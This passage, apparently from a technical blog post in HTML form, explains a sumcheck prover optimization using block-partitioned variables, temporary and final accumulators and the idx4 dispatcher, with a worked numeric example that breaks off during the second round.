&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $x_{in}$ is the set of variables over which the &amp;#39;&amp;#39;inner sum&amp;#39;&amp;#39; is calculated.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $x_{out}$ is the set of variables over which the &amp;#39;&amp;#39;outer sum&amp;#39;&amp;#39; iterates.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;blockquote&gt;
&lt;p&gt;The $l$ total variables of the polynomial are divided into three disjoint groups whose union forms the complete set of variables:&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Pre-computation Prefix $\beta$** : The first $l_0$ variables.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. **Set $x_{in}$** : The next $\lfloor l&#x2F;2 \rfloor$ variables&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. **Set $x_{out}$** : The final $\lfloor l&#x2F;2 \rfloor - l_0$ variables&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Therefore, $x_{in}$ and $x_{out}$ &lt;strong&gt;together form a partition&lt;&#x2F;strong&gt; of the set of variables that do not belong to the pre-computation prefix (i.e., the pre-computation suffix). The sum of their sizes is $(\lfloor l&#x2F;2 \rfloor) + (\lfloor l&#x2F;2 \rfloor - l_0) = 2\lfloor l&#x2F;2 \rfloor - l_0$, which equals $l - l_0$, the total size of the pre-computation suffix, whenever $l$ is even.&lt;&#x2F;p&gt;
&lt;p&gt;Now that we have settled the notation and parameters involved, let’s see how their algorithm actually computes the desired values in round $i$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-effect-of-block-description-in-the-pre-computation-phase&quot;&gt;The effect of block partitioning in the pre-computation phase&lt;&#x2F;h3&gt;
&lt;p&gt;In order to compute $t_i (u)$, the authors make use of the SmallValue optimization, which allows the prover to evaluate a product of multilinear polynomials at the random challenges sent by the verifier. As we mentioned in an earlier post, this is done by shifting the burden of evaluation to multivariate Lagrange polynomials defined over a grid of points with coefficients in the base field, and evaluating those polynomials. The desired evaluation then becomes a sum weighted by pre-computed coefficients called accumulators, which depend on the grid and on the product.&lt;&#x2F;p&gt;
&lt;p&gt;For concreteness, recall the definition of $t_i$&lt;&#x2F;p&gt;
&lt;p&gt;$$t_i(u) = \sum\limits_{x’} \tilde{eq}(w_{&amp;gt;i}, x’) \cdot \prod_{k = 1}^{d} p_k(r,u,x’)$$&lt;&#x2F;p&gt;
&lt;p&gt;The SmallValues optimization allows a re-writing of this as&lt;&#x2F;p&gt;
&lt;p&gt;$$t_i(u) = \sum\limits_{v\in G_i} \left(\sum_{x’} \tilde{eq}(w_{&amp;gt;i}, x’) \cdot \prod_{k=1}^{d} p_k(v,u,x’)\right)\cdot L_v(r) $$&lt;&#x2F;p&gt;
&lt;p&gt;where&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $G_i$ is an adequate interpolation grid of points in the base field. Specifically, if $g$ is a product of $d$ multilinear polynomials not counting the eq factor, setting $U_d = \{\infty, 0, 1, \dots, d - 1\}$ then $$G_i = U_d^{ i - 1 }\quad i\geq 2\quad\text{and}\quad G_1 = \emptyset$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The polynomials $L_v$ are the $i - 1$ variate Lagrange interpolation polynomials associated with the grid $G_i$ - it is those polynomials that end up being evaluated at the challenges $r_1,\ldots r_{ i - 1}$. For $i = 1$ we set $L_1 = 1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The authors collect the $\lvert G_i\rvert$ values of the polynomials $L_v(r)$ into a single $\lvert G_i\rvert$-long vector indexed by the points of the grid: the challenge vector $R_i$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. The sum between parentheses in the last line is the definition of the **accumulators $A_i(v,u)$** \- simply the coefficients needed to express, in terms of the Lagrange interpolation polynomials, the value of $t_i(u)$. The authors express this as an &amp;#39;&amp;#39;inner product&amp;#39;&amp;#39; between the challenge vector and an accumulator vector, also indexed by $v$: $$t_i(u) = \sum\limits_{ v\in G_i} R_i (v)A_i (v,u)$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
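&lt;p&gt;To make the inner-product view concrete, here is a minimal Python sketch (all names, such as &lt;code&gt;t_i&lt;&#x2F;code&gt;, are ours and purely illustrative): the round polynomial evaluation is a weighted sum of accumulators, with the Lagrange evaluations $R_i(v)$ as weights.&lt;&#x2F;p&gt;

```python
# Illustrative sketch (names are ours): t_i(u) as an inner product of the
# challenge vector R_i (Lagrange evaluations at past challenges) with the
# pre-computed accumulators A_i(v, u), indexed by the grid points v.
def t_i(u, R_i, A_i):
    return sum(R_i[v] * A_i[(v, u)] for v in R_i)

# Toy data: two grid points with unit Lagrange weights
R = {"a": 1, "b": 1}
A = {("a", 0): 4, ("b", 0): 5}
print(t_i(0, R, A))  # 9
```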
&lt;p&gt;Now it is time to let the power of block partitioning shine and do its magic: the sum over $x’$ can now be taken in two steps:&lt;&#x2F;p&gt;
&lt;p&gt;$$A_i(v, u) = \sum_{x_{out}} \tilde{eq}(w_{out}, x_{out}) \sum_{x_{in}} \tilde{eq}(w_{in}, x_{in}) \prod_{k = 1}^{d} p_k(v, u, x_{in}, x_{out})$$&lt;&#x2F;p&gt;
&lt;p&gt;Don’t panic, we’re almost there. Consider now the prefix $\beta = (v,u)$ and write $E_{in}[x_{in}] = \tilde{eq}(w_{in},x_{in})$. The innermost sum is then parametrized by $\beta$ and $x_{out}$, and we shall call it the temporary accumulator $tA[\beta]$:&lt;&#x2F;p&gt;
&lt;p&gt;$$tA[\beta] = \sum_{x_{in} \in \{0,1\}^{ l&#x2F;2 }} E_{in}[x_{in}] \cdot \prod_{k = 1}^{d} p_k(\beta, x_{in}, x_{out})$$&lt;&#x2F;p&gt;
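&lt;p&gt;A hedged sketch of this computation, under our own naming: for a fixed $x_{out}$, it sums the product of the $p_k$ factors over the binary assignments of $x_{in}$, weighted by $E_{in}$; zero &lt;code&gt;eq&lt;&#x2F;code&gt; weights prune most terms.&lt;&#x2F;p&gt;

```python
# Hedged sketch of the temporary accumulator tA[beta] (names are ours):
# for fixed x_out, sum over binary x_in the product of the p_k factors,
# weighted by the eq weight E_in[x_in]; zero weights prune the sum.
from itertools import product as cartesian

def temp_accumulator(beta, x_out, E_in, p_factors, n_in):
    total = 0
    for x_in in cartesian([0, 1], repeat=n_in):
        w = E_in[x_in]
        if w != 0:
            term = w
            for p in p_factors:
                term = term * p(beta, x_in, x_out)
            total = total + term
    return total
```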
&lt;p&gt;Now that we have baptized the proper objects, we can describe how the algorithm works.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;logic-and-algorithmic-steps&quot;&gt;Logic and Algorithmic Steps:&lt;&#x2F;h4&gt;
&lt;p&gt;The core idea is a form of &lt;strong&gt;memoization&lt;&#x2F;strong&gt;. Instead of calculating the entire sum for each accumulator, it calculates the innermost sum once and reuses the result: this is precisely the effect of the block partitioning.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Outer Iteration over $x_{out}$** : The algorithm has a main loop that iterates over all possible assignments of the variables in the $x_{out}$ segment.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. **Inner Sum Calculation** : Inside that loop, for a fixed value of $x_{out}$, the algorithm computes the innermost sum. This sum is over all assignments of $x_{in}$ and depends on the prefix $\beta$ (which generalizes $(v,u,y)$) and the current $x_{out}$.  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;a. For each prefix $\beta$, it computes $\sum_{x_{in}} E_{in}[x_{in}] \cdot \prod p_k(\beta, x_{in}, x_{out})$.&lt;br &#x2F;&gt;
b. The result of this inner sum for each $\beta$ is stored in a &lt;strong&gt;temporary accumulator&lt;&#x2F;strong&gt; called $tA[\beta]$.
3. &lt;strong&gt;Distribution to Final Accumulators&lt;&#x2F;strong&gt; : Once all the $tA$ values have been computed for the current $x_{out}$, the algorithm distributes them to the final accumulators $A_i(v,u)$. This is done in the following way:&lt;br &#x2F;&gt;
a. It iterates over each prefix $\beta$ and its corresponding value in $tA[\beta]$.&lt;br &#x2F;&gt;
b. Using the mapping function &lt;code&gt;idx4&lt;&#x2F;code&gt; (defined in A.5), it determines which final accumulators $(i, v, u)$ this prefix $\beta$ contributes to.&lt;br &#x2F;&gt;
c. It adds the value of $tA[\beta]$ to the appropriate final accumulator, weighted by the outer &lt;code&gt;eq-poly&lt;&#x2F;code&gt; factor, $E_{out,i}$.&lt;&#x2F;p&gt;
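&lt;p&gt;The steps above can be sketched as follows (a toy model under our own naming, not the paper’s actual Procedure 9): memoize the inner sum once per prefix and fixed $x_{out}$, then route each temporary accumulator to the final accumulators it feeds.&lt;&#x2F;p&gt;

```python
# Toy model of the pre-computation loop (our naming): memoize the inner
# sum once per (beta, x_out), then route each tA[beta] to every final
# accumulator it feeds, weighted by the outer eq factor E_out.
from itertools import product as cartesian

def precompute(betas, n_out, E_out, inner_sum, dispatch):
    A = {}
    for x_out in cartesian([0, 1], repeat=n_out):
        tA = {beta: inner_sum(beta, x_out) for beta in betas}
        for beta, value in tA.items():
            for addr in dispatch(beta):  # addr plays the role of (i, v, u)
                A[addr] = A.get(addr, 0) + E_out[x_out] * value
    return A
```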
&lt;h3 id=&quot;classification-and-distribution-mechanism&quot;&gt;Classification and distribution mechanism&lt;&#x2F;h3&gt;
&lt;p&gt;We discussed this method when we studied BDDT’s SmallValue optimization, but it is worth reminding the reader how it is performed. The role of the &lt;em&gt;idx4&lt;&#x2F;em&gt; classification algorithm is to act as an intelligent &lt;strong&gt;’‘dispatcher’’ or ’‘router’’&lt;&#x2F;strong&gt; during the pre-computation phase. Its function is to determine which final accumulators $A_i(v,u)$, possibly from different rounds, should be updated with an intermediate result that has just been computed.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Procedure 9&lt;&#x2F;em&gt; (the pre-computation engine for Algorithm 6) is designed for high efficiency. Instead of calculating each accumulator $A_i(v,u)$ separately, it iterates over all possible prefixes $\beta$ of length $l_0$ and computes a single value for each: the temporary accumulator $tA[\beta]$.&lt;&#x2F;p&gt;
&lt;p&gt;The problem is that a single value $tA[\beta]$ (calculated, for example, for the prefix $\beta=(0,1,0)$) can be part of the calculation for:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The accumulator for **Round 1** : $A_1(u=0)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The accumulator for **Round 2** : $A_2(v=(0), u=1)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The accumulator for **Round 3** : $A_3(v=(0,1), u=0)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The question that &lt;em&gt;idx4&lt;&#x2F;em&gt; answers is: given a $\beta$, what are all the ’‘addresses’’ $(i, v, u)$ of the final accumulators to which this $tA[\beta]$ must be sent?&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Its logic consists of “decomposing” the prefix $\beta$ for each round $i$ (from 1 to $l_0$) and checking if it meets the required structure. For a prefix $\beta$ to be valid for an accumulator of round $i$, the part of the prefix corresponding to the future variables (the vector $y$) &lt;strong&gt;must be binary (containing only 0s and 1s)&lt;&#x2F;strong&gt;. The fact that the polynomial $g$ has an $eq$ factor ends up greatly simplifying this distribution step, since only a very small number of precomputed products and sums are involved in the construction of the accumulators.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h3 id=&quot;intuitive-example&quot;&gt;Intuitive Example&lt;&#x2F;h3&gt;
&lt;p&gt;Imagine $l_0 = 3$ and the computed prefix is $\beta = (0, 1, 0)$. &lt;em&gt;idx4&lt;&#x2F;em&gt; would do the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Does it contribute to Round 1 ($i = 1$)?**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;a. $u=\beta_1=0$.&lt;br &#x2F;&gt;
b. The remainder is $y = (\beta_2, \beta_3) = (1,0)$.&lt;br &#x2F;&gt;
c. Since $y$ is binary, &lt;strong&gt;Yes&lt;&#x2F;strong&gt;. &lt;em&gt;idx4&lt;&#x2F;em&gt; generates the tuple &lt;em&gt;$(i=1, v=(), u = 0, y = (1,0))$&lt;&#x2F;em&gt;.
2. &lt;strong&gt;Does it contribute to Round 2 ($i = 2$)?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
a. $v = (\beta_1) = (0)$.&lt;br &#x2F;&gt;
b. $u = \beta_2 = 1$.&lt;br &#x2F;&gt;
c. The remainder is $y=(\beta_3)=(0)$.&lt;br &#x2F;&gt;
d. Since $y$ is binary, &lt;strong&gt;Yes&lt;&#x2F;strong&gt;. &lt;em&gt;idx4&lt;&#x2F;em&gt; generates the tuple $(i=2, v=(0), u=1, y=(0))$.
3. &lt;strong&gt;Does it contribute to Round 3 ($i = 3$)?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
a. $v = (\beta_1, \beta_2) = (0,1)$.&lt;br &#x2F;&gt;
b. $u=\beta_3=0$.&lt;br &#x2F;&gt;
c. The remainder, $y$, is empty.&lt;br &#x2F;&gt;
d. &lt;strong&gt;Yes&lt;&#x2F;strong&gt;. &lt;em&gt;idx4&lt;&#x2F;em&gt; generates the tuple $(i = 3, v = (0,1), u = 0, y = ())$.&lt;&#x2F;p&gt;
&lt;p&gt;In contrast, if $\beta = (2, 1, 0)$, it would only contribute to Round 1. For Rounds 2 and 3, the $v$ part of the prefix would contain a &lt;code&gt;2&lt;&#x2F;code&gt;, which is not a binary value and thus is not part of the sum over the Boolean hypercube that defines the accumulators for those rounds.&lt;&#x2F;p&gt;
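&lt;p&gt;A compact sketch of this dispatching logic (our own simplified model of &lt;em&gt;idx4&lt;&#x2F;em&gt;, with the string &quot;inf&quot; standing for $\infty$): decompose $\beta$ for every round, and keep the rounds where the suffix $y$ is binary and the $v$ part lies in the interpolation grid.&lt;&#x2F;p&gt;

```python
# Simplified model of idx4 (our code; "inf" stands for the infinity
# point of the grid). For each round i, split beta into v, u, y and keep
# the address when y is binary and v lies in the interpolation grid.
def idx4(beta, grid):
    addresses = []
    for i in range(1, len(beta) + 1):
        v, u, y = beta[:i - 1], beta[i - 1], beta[i:]
        v_ok = all(c in grid for c in v)
        y_ok = all(c in (0, 1) for c in y)
        if v_ok and y_ok:
            addresses.append((i, v, u, y))
    return addresses

print(idx4((0, 1, 0), {"inf", 0, 1}))  # three addresses, one per round
print(idx4((2, 1, 0), {"inf", 0, 1}))  # only the round-1 address
```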
&lt;h2 id=&quot;a-small-example-before-you-fall-off-the-chair&quot;&gt;A small example before you fall off the chair&lt;&#x2F;h2&gt;
&lt;p&gt;To fix ideas, we will now walk through an example with small, concrete numbers. If you will, grab a piece of paper and some coffee and double check the computations as we move along the initial rounds.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;setup&quot;&gt;Setup&lt;&#x2F;h3&gt;
&lt;p&gt;We will use a polynomial of &lt;strong&gt;6 variables&lt;&#x2F;strong&gt; while keeping the optimization rounds at &lt;strong&gt;$l_0 = 2$&lt;&#x2F;strong&gt;. This change allows us to have a non-empty $x_{out}$ in Round 2, thus showing the complete interaction between temporary and final accumulators.&lt;&#x2F;p&gt;
&lt;p&gt;Consider the polynomial&lt;&#x2F;p&gt;
&lt;p&gt;$$g(X) = \tilde{eq}(w, X) \cdot (X_1 + X_3 + X_5 + 1) \cdot (X_2 + X_4 + X_6 + 2)$$&lt;&#x2F;p&gt;
&lt;p&gt;where $\tilde{eq}$ is the equality polynomial for the vector $w = (1, 0, 1, 1, 0, 1)$. Since $l_0 = 2$, only rounds 1 and 2 are optimized. Following the authors’ choice of interpolation set, we will stick to $U_2 = \{\infty, 0, 1 \}$. The prover needs to compute $t_2(u)$ for $u \in \hat{U_2} = \{\infty, 0\}$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;getting-the-partitioning-straight&quot;&gt;Getting the partitioning straight&lt;&#x2F;h3&gt;
&lt;p&gt;Since $\ell_0=2$, the 6 variables are partitioned as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **The pre-computation prefix** $\beta = (X_1, X_2)$ and its &amp;#39;&amp;#39;eq&amp;#39;&amp;#39; companion $w_L=(w_1, w_2)=(1,0)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **The pre-computation suffix** $(X_3, X_4, X_5, X_6)$ is then split as  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;a. &lt;strong&gt;$x_{in}$ (size $l&#x2F;2 = 3$)&lt;&#x2F;strong&gt; : $(X_3, X_4, X_5)$. Its &lt;code&gt;eq&lt;&#x2F;code&gt; vector is $w_{in} = (w_3, w_4, w_5) = (1,1,0)$.&lt;br &#x2F;&gt;
b. &lt;strong&gt;$x_{out}$ (size $l&#x2F;2 - l_0 = 1$)&lt;&#x2F;strong&gt; : $(X_6)$. Its &lt;code&gt;eq&lt;&#x2F;code&gt; vector is $w_{out} = (w_6) = (1)$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-first-round&quot;&gt;The first round&lt;&#x2F;h3&gt;
&lt;p&gt;The prover needs to compute the values of&lt;&#x2F;p&gt;
&lt;p&gt;$$s_1 (X_1) = l_1 (X_1) t_1 (X_1)$$&lt;&#x2F;p&gt;
&lt;p&gt;at $\infty$ and $0$. Remember that the linear factor $l_i (X_i)$ is defined as:&lt;br &#x2F;&gt;
$$l_i(X_i) = \underbrace{\tilde{eq}(w_{[&amp;lt;i]}, r_{[&amp;lt;i]})}_ {\text{past challenges}} \cdot \underbrace{\tilde{eq}(w_i, X_i)}_ {\text{current variable}}$$&lt;&#x2F;p&gt;
&lt;p&gt;So in round 1 ($i = 1$) the set of past challenges $r_{[&amp;lt;1]}$ is empty. By convention, a product over an empty set is 1. Therefore, the first factor of the formula is simply 1. This means that&lt;&#x2F;p&gt;
&lt;p&gt;$$l_1 (X_1) = 1 \cdot \tilde{eq}(w_1, X_1) = \tilde{eq}(1, X_1) = X_1$$&lt;&#x2F;p&gt;
&lt;p&gt;This implies that $l_1 (\infty) = 1$ and $l_1 (0) = 0$ so the good news is that we don’t need to compute $t_1 (0)$. Let’s get to work and see how the leading coefficient of $t_1$ is computed.&lt;&#x2F;p&gt;
&lt;p&gt;According to Algorithm 6,&lt;br &#x2F;&gt;
$$t_1(u) = \langle R_1, A_1(u) \rangle = A_1(u) \quad (\text{since } R_1=[1])$$&lt;&#x2F;p&gt;
&lt;p&gt;Therefore, the task reduces to calculating the final accumulator $A_1(\infty)$ and this is where the temporary accumulators come into play. Since the optimization parameter is $\ell_0 = 2$ then&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * for this first round the prefixes $\beta$ we will be interested in taking in account are $$\beta = (\infty,0)\quad\text{and}\quad \beta = (\infty,1)$$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * then the **suffix** is split into $x_{in}=(X_3,X_4,X_5)$ and $x_{out}=(X_6)$ and since the **`eq` vectors** are $w_{in} = (1,1,0)$ and $w_{out} = (1)$, we have $$E_{out,1}(1,0) = 0\quad\text{and}\quad E_{out,1}(1,1) = 1$$ so we won&amp;#39;t be computing the temporary accumulator for $x_6 = 0$ (it gets multiplied by zero).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;For completeness, we include here a small table with the precomputation in this case:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Temporary Accumulators for $x_6 = 1$&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$u$&lt;&#x2F;th&gt;&lt;th&gt;$y_2$&lt;&#x2F;th&gt;&lt;th&gt;$p_1 = u + 2$&lt;&#x2F;th&gt;&lt;th&gt;$p_2 = y_2 + 4$&lt;&#x2F;th&gt;&lt;th&gt;&lt;strong&gt;$tA [u,y_2]$&lt;&#x2F;strong&gt;&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$\infty$&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;$1 \cdot 4 = 4$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$\infty$&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;$1 \cdot 5 = 5$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;$2 \cdot 4 = 8$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;$2 \cdot 5 = 10$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;So let’s compute the outer loop for $x_6 = 1$. The inner weight of the product is given by $E_{in}[x_{in}] = \tilde{eq}(w_{in},x_{in})$, which vanishes unless $x_{in} = w_{in} = (1,1,0)$, so the only term in the inner sum is the one corresponding to $x_{in} = (1,1,0)$ and so&lt;&#x2F;p&gt;
&lt;p&gt;$$tA[\infty,0] = p_1 (\infty,0,1,1,0,1) \cdot p_2 (\infty,0,1,1,0,1) = 1\cdot 4 = 4$$&lt;&#x2F;p&gt;
&lt;p&gt;and&lt;&#x2F;p&gt;
&lt;p&gt;$$tA[\infty,1] = p_1(\infty,1,1,1,0,1)\cdot p_2(\infty,1,1,1,0,1) = 1\cdot 5 = 5$$&lt;&#x2F;p&gt;
&lt;p&gt;which implies that&lt;&#x2F;p&gt;
&lt;p&gt;$$A_1(\infty) = 1\cdot tA[\infty,0] + 1\cdot tA[\infty,1] = 4 + 5 = 9$$&lt;br &#x2F;&gt;
and so, the prover sends&lt;&#x2F;p&gt;
&lt;p&gt;$$s_1 (\infty) = 1\cdot 9 = 9\quad\text{and }\quad s_1(0) = 0$$&lt;&#x2F;p&gt;
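&lt;p&gt;The round-1 numbers can be re-derived in a few lines of Python (our sketch; evaluation &quot;at infinity&quot; means taking the leading coefficient in the current variable):&lt;&#x2F;p&gt;

```python
# Re-deriving the round-1 numbers of the worked example (our sketch).
# p1 = X1 + X3 + X5 + 1 and p2 = X2 + X4 + X6 + 2; the eq weights force
# x_in = (1, 1, 0) and x_6 = 1, so only two prefixes survive.
def p1(x1, x3, x5):
    # "inf" means: take the leading coefficient in X1, which is 1
    return 1 if x1 == "inf" else x1 + x3 + x5 + 1

def p2(x2, x4, x6):
    return 1 if x2 == "inf" else x2 + x4 + x6 + 2

# Temporary accumulators for the two surviving prefixes beta = (inf, y2)
tA = {("inf", y2): p1("inf", 1, 0) * p2(y2, 1, 1) for y2 in (0, 1)}

# A_1(inf) sums them with unit weights, as in the text
A1_inf = tA[("inf", 0)] + tA[("inf", 1)]
print(tA, A1_inf)  # tA values 4 and 5, A_1(inf) = 9
```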
&lt;h3 id=&quot;the-second-round&quot;&gt;The second round&lt;&#x2F;h3&gt;
&lt;p&gt;Firstly, we tackle the linear factor $l_2 (X_2)$. This factor comes from the &lt;code&gt;eq&lt;&#x2F;code&gt; over the prefix variables $(X_1, X_2)$ evaluated at $(r_1, X_2)$:&lt;br &#x2F;&gt;
$$l_2(X_2) = \tilde{eq}((w_1, w_2), (r_1, X_2)) = \tilde{eq}(1, r_1) \cdot \tilde{eq}(0, X_2) = r_1 \cdot (1-X_2)$$&lt;&#x2F;p&gt;
&lt;p&gt;and obviously&lt;&#x2F;p&gt;
&lt;p&gt;$$l_2(\infty) = - r_1\quad\text{and}\quad l_2(0) = r_1$$&lt;&#x2F;p&gt;
&lt;p&gt;Now comes the tough part of computing $t_2(X_2)$. Since this is computed via the SmallValue optimization, it involves combining the evaluations at the random challenge $r_1$ of the Lagrange interpolation polynomials using the pre-computed accumulators: this ends up being a sum of products and the authors usually show this as an inner product $$t_2(u) = \langle R_2, A_2(u) \rangle$$ where the challenge vector $R_2$ depends on $r_1$ and $U_2 = \{\infty, 0, 1\}$, and is calculated as:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $R_2[\infty] = (r_1 - 0)(r_1 - 1) = r_1(r_1 - 1)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $R_2[0] = \frac{r_1 - 1}{0 - 1} = 1 - r_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $R_2[1] = \frac{r_1 - 0}{1 - 0} = r_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;blockquote&gt;
&lt;p&gt;The challenge vector is then &lt;strong&gt;$R_2 = (r_1 (r_1 - 1), 1 - r_1, r_1)$&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
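&lt;p&gt;As a quick sanity check (our sketch), note that at a binary challenge the finite entries of $R_2$ reduce to an indicator vector, while the $\infty$ entry, which extracts the leading coefficient, vanishes:&lt;&#x2F;p&gt;

```python
# The round-2 challenge vector over U_2 = {inf, 0, 1}, as in the text:
# R_2(r) = (r(r - 1), 1 - r, r).
def R2(r):
    return (r * (r - 1), 1 - r, r)

print(R2(0))  # (0, 1, 0): indicator of the point 0
print(R2(1))  # (0, 0, 1): indicator of the point 1
```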
&lt;p&gt;We will now compute the values $A_2(v,u)$ for $v,u \in U_2$ by following the logic of Procedure 9, which iterates over $x_{out} = (X_6)$; again, since&lt;&#x2F;p&gt;
&lt;p&gt;$$E_{out,2} (1,X_6) = X_6$$&lt;&#x2F;p&gt;
&lt;p&gt;we only need to take into account the case $x_6 = 1$. Also, the computation of the temporary accumulators $tA$ in this case benefits from what we already learned in the first round: the sum still collapses to $x_{in} = (1,1,0)$. For completeness, we include&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Temporary Accumulators for $x_6 = 1$&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
